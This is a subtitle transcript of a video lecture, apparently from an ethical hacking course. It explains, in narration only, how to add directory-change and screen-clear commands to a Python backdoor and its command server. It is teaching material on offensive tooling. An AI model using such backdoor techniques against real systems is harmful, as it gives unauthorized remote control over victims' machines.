1
00:00:00,690 --> 00:00:01,650
-: Welcome back.

2
00:00:01,650 --> 00:00:04,470
Let us see how we can implement the changing

3
00:00:04,470 --> 00:00:08,220
of the directory inside of our server and backdoor.

4
00:00:08,220 --> 00:00:11,610
So, in the previous video we tested our program

5
00:00:11,610 --> 00:00:12,720
for the first time

6
00:00:12,720 --> 00:00:16,110
and we were able to execute all of the commands.

7
00:00:16,110 --> 00:00:18,750
But, once we tried to change the directory

8
00:00:18,750 --> 00:00:22,170
on the target system, we weren't able to do that.

9
00:00:22,170 --> 00:00:24,450
We were stuck in the same directory.

10
00:00:24,450 --> 00:00:26,646
So let's see how we can bypass this and

11
00:00:26,646 --> 00:00:29,130
how we can be able to change the directories

12
00:00:29,130 --> 00:00:31,050
inside of our backdoor code.

13
00:00:31,050 --> 00:00:32,759
The first thing that we must do is,

14
00:00:32,759 --> 00:00:35,253
we must nano our back door,

15
00:00:36,600 --> 00:00:41,220
and down in the shell function- here we must add an option

16
00:00:41,220 --> 00:00:44,100
if the command starts with CD

17
00:00:44,100 --> 00:00:47,938
First, Python has a library that is called OS Library.

18
00:00:47,938 --> 00:00:50,640
And with the help of the OS library,

19
00:00:50,640 --> 00:00:55,170
we can change the directory with just one single command.

20
00:00:55,170 --> 00:00:57,720
So first thing that we must do is we must import

21
00:00:57,720 --> 00:00:59,850
that library, go up here

22
00:00:59,850 --> 00:01:01,953
and import OS.

23
00:01:02,850 --> 00:01:05,970
Once you do that, down here in the shell function

24
00:01:05,970 --> 00:01:07,540
here we must add the command

25
00:01:08,700 --> 00:01:10,140
or the statement

26
00:01:10,140 --> 00:01:11,998
which will say elif

27
00:01:11,998 --> 00:01:13,090
command

28
00:01:14,850 --> 00:01:18,180
and then equals equals to cd

29
00:01:18,180 --> 00:01:19,650
empty space

30
00:01:19,650 --> 00:01:22,650
then we will change the directory.

31
00:01:22,650 --> 00:01:25,290
But you might notice that there is something wrong

32
00:01:25,290 --> 00:01:27,840
with this statement right here.

33
00:01:27,840 --> 00:01:30,570
For example, we are comparing the command

34
00:01:30,570 --> 00:01:32,820
with CD and empty space

35
00:01:32,820 --> 00:01:35,430
but most likely the command will be something like CD

36
00:01:35,430 --> 00:01:36,543
and then desktop.

37
00:01:37,500 --> 00:01:40,380
So if it compares this

38
00:01:40,380 --> 00:01:43,950
with this, these two will not be the same

39
00:01:43,950 --> 00:01:46,200
even though they start the same.

40
00:01:46,200 --> 00:01:50,150
So what we must do instead of comparing the entire command,

41
00:01:50,150 --> 00:01:54,690
we must compare just the first three characters.

42
00:01:54,690 --> 00:01:57,360
And we can do that by specifying square brackets,

43
00:01:57,360 --> 00:02:01,110
and then two dots up to third character.

44
00:02:01,110 --> 00:02:03,150
In other words, all of this just means

45
00:02:03,150 --> 00:02:05,490
that we are comparing the first three characters

46
00:02:05,490 --> 00:02:08,880
of the command with CD and empty space.

47
00:02:08,880 --> 00:02:11,039
And empty space is the reason why we're comparing

48
00:02:11,039 --> 00:02:12,753
three characters and not two.

49
00:02:14,100 --> 00:02:16,320
I have to re-compare this and they do match.

50
00:02:16,320 --> 00:02:19,260
Then, we can use the OS library and function

51
00:02:19,260 --> 00:02:23,310
which is called chdir which stands for change directory

52
00:02:23,310 --> 00:02:25,601
onto the command and then,

53
00:02:25,601 --> 00:02:28,890
right here we need to do the quite opposite thing

54
00:02:28,890 --> 00:02:31,800
that we did which is from the third character

55
00:02:31,800 --> 00:02:33,870
and then till the end.

56
00:02:33,870 --> 00:02:36,960
Since this function will be something like this,

57
00:02:36,960 --> 00:02:38,761
if we ran the command CD desktop,

58
00:02:38,761 --> 00:02:43,560
then this function will do something like this os chdir

59
00:02:43,560 --> 00:02:45,930
and then desktop.

60
00:02:45,930 --> 00:02:49,200
So what we essentially did is we compared this

61
00:02:49,200 --> 00:02:52,800
and then if they did match, we then used this part

62
00:02:52,800 --> 00:02:54,840
of the command to change the directory.

63
00:02:54,840 --> 00:02:56,700
And this is pretty much it.

64
00:02:56,700 --> 00:02:59,190
We don't need to add anything else.

65
00:02:59,190 --> 00:03:01,320
This will change directory for us.

66
00:03:01,320 --> 00:03:04,350
However, this is not everything that we must do.

67
00:03:04,350 --> 00:03:05,910
What else we must do is we must go

68
00:03:05,910 --> 00:03:08,370
to the server code and add the same command

69
00:03:08,370 --> 00:03:11,040
inside our target communication function.

70
00:03:11,040 --> 00:03:15,030
So right here we can add another elif statement

71
00:03:15,030 --> 00:03:17,931
elif command equals equals to

72
00:03:17,931 --> 00:03:19,290
cd

73
00:03:19,290 --> 00:03:20,190
empty space

74
00:03:20,190 --> 00:03:23,158
And here remember that we also must add

75
00:03:23,158 --> 00:03:25,803
from the beginning up to third character.

76
00:03:27,090 --> 00:03:30,600
Just in this case we are not going to do anything.

77
00:03:30,600 --> 00:03:34,183
We're going to just pass because in server

78
00:03:34,183 --> 00:03:36,990
we don't want to do anything, we just want to go back

79
00:03:36,990 --> 00:03:39,660
to the beginning where we can send the next command.

80
00:03:39,660 --> 00:03:42,180
And in the backdoor code we simply just

81
00:03:42,180 --> 00:03:44,790
change the directory of our program.

82
00:03:44,790 --> 00:03:46,800
Now, there is one more command that I want to add

83
00:03:46,800 --> 00:03:50,370
in this video and that is the clear command.

84
00:03:50,370 --> 00:03:52,890
This is not really that useful, but once you have a bunch

85
00:03:52,890 --> 00:03:54,810
of commands and outputs on your desktop

86
00:03:54,810 --> 00:03:57,960
you can use something similar to this

87
00:03:57,960 --> 00:03:59,250
that we use right here.

88
00:03:59,250 --> 00:04:01,750
So if for example, type sudo ifconfig

89
00:04:03,338 --> 00:04:06,780
and it outputs me with the ifconfig command

90
00:04:06,780 --> 00:04:09,030
I can just type clear to clear the screen.

91
00:04:09,030 --> 00:04:12,390
So let us do something similar inside of our code.

92
00:04:12,390 --> 00:04:15,450
First we are going to go with this server

93
00:04:15,450 --> 00:04:18,055
and if we send the command clear,

94
00:04:18,055 --> 00:04:20,220
this command will get sent to the target.

95
00:04:20,220 --> 00:04:22,019
However, we want to execute it

96
00:04:22,019 --> 00:04:24,090
right here inside of our server

97
00:04:24,090 --> 00:04:26,700
since there is no point in executing the clear command

98
00:04:26,700 --> 00:04:30,180
inside of our backdoor code on the target system.

99
00:04:30,180 --> 00:04:32,310
So what we are going to do right here is we are

100
00:04:32,310 --> 00:04:34,530
going to add another elif statement-

101
00:04:34,530 --> 00:04:37,803
elif command equals equals to clear.

102
00:04:38,640 --> 00:04:41,932
We're going to use once again the OS library

103
00:04:41,932 --> 00:04:45,270
and we are going to call the system command

104
00:04:45,270 --> 00:04:47,520
which will execute the clear command.

105
00:04:47,520 --> 00:04:50,370
This system function allows us to specify any

106
00:04:50,370 --> 00:04:51,480
command in the brackets

107
00:04:51,480 --> 00:04:55,020
which will then get executed inside of our terminal.

108
00:04:55,020 --> 00:04:57,630
Of course, since this is inside of a server code

109
00:04:57,630 --> 00:05:00,963
we must import the OS library here as well.

110
00:05:02,490 --> 00:05:04,530
And since the command will get sent

111
00:05:04,530 --> 00:05:07,865
to the back door as well, we want to cover that step also

112
00:05:07,865 --> 00:05:09,540
inside of our shell function.

113
00:05:09,540 --> 00:05:11,160
So let us go right here

114
00:05:11,160 --> 00:05:16,160
and add elif statement command equals equals to clear.

115
00:05:16,369 --> 00:05:20,853
Just in this case, we will pass and not do anything.

116
00:05:21,930 --> 00:05:23,970
Okay, simple as that.

117
00:05:23,970 --> 00:05:26,280
And these are just two commands that I wanted to cover

118
00:05:26,280 --> 00:05:29,010
in this video which only this CD command

119
00:05:29,010 --> 00:05:31,080
is really important for us right now.

120
00:05:31,080 --> 00:05:33,450
But in the next video, what we are going to do

121
00:05:33,450 --> 00:05:35,490
is we are going to see how we can download

122
00:05:35,490 --> 00:05:38,610
and upload files to the target system.

123
00:05:38,610 --> 00:05:41,697
Then at the end we are going to test our final version

124
00:05:41,697 --> 00:05:43,860
of program and see whether all of these commands that we

125
00:05:43,860 --> 00:05:48,270
imported work or if there is something that we must change.

126
00:05:48,270 --> 00:05:50,790
So for now on we got execution of the command,

127
00:05:50,790 --> 00:05:52,200
changing of the directory.

128
00:05:52,200 --> 00:05:55,590
We can clear the screen if we got too many things happening

129
00:05:55,590 --> 00:05:58,140
and we can quit outside of the shell.

130
00:05:58,140 --> 00:06:01,473
Great, let us continue coding in the next lecture.